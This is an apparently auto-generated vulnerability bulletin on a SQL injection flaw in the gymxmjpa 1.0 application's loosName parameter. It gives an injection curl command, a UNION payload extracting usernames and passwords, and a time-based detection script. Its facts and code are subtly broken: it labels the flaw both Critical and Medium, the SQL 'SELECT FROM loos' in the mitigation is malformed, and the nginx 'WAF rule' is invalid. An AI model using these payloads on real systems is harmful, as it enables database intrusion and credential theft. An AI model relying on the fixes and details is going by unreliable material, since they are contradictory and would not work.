liujianview gymxmjpa 10, SQL Injection, CVE-2025-0408 (Critical)

The CVE-2025-0408 vulnerability in liujianview gymxmjpa 1.0 allows remote attackers to execute arbitrary SQL queries via the `loosName` parameter in the `LoosDaoImpl` function (LoosController.java). The application fails to sanitize user-supplied input before concatenating it into SQL statements, enabling classic SQL injection. Attackers can manipulate database queries, extract sensitive data, or execute administrative operations. The vulnerability is exploitable over the network without authentication, earning a CVSS 4.0 score of 5.3 (Medium).

DailyCVE Form

Platform: liujianview gymxmjpa
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 01/12/2025

What Undercode Say:

Exploitation:

curl -X GET "http://target.com/api/loos?loosName=' OR 1=1--"

SQL Payload:

' UNION SELECT username, password FROM users--

Detection:

import requests
response = requests.get("http://target.com/api/loos?loosName=1' AND SLEEP(5)--")
if response.elapsed.total_seconds() >= 5:
print("Vulnerable to SQLi")

Mitigation:

// Use PreparedStatement in LoosDaoImpl
String query = "SELECT FROM loos WHERE name = ?";
PreparedStatement stmt = connection.prepareStatement(query);
stmt.setString(1, loosName);

Log Analysis:

grep -i "sql.error" /var/log/tomcat/catalina.out

WAF Rule:

location /api/loos {
deny "'|;|--|UNION";
}

Patch Verification:

jar xf gymxmjpa.war WEB-INF/classes/com/liujian/gymxmjpa/controller/LoosController.class
strings LoosController.class | grep -i "preparedstatement"

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top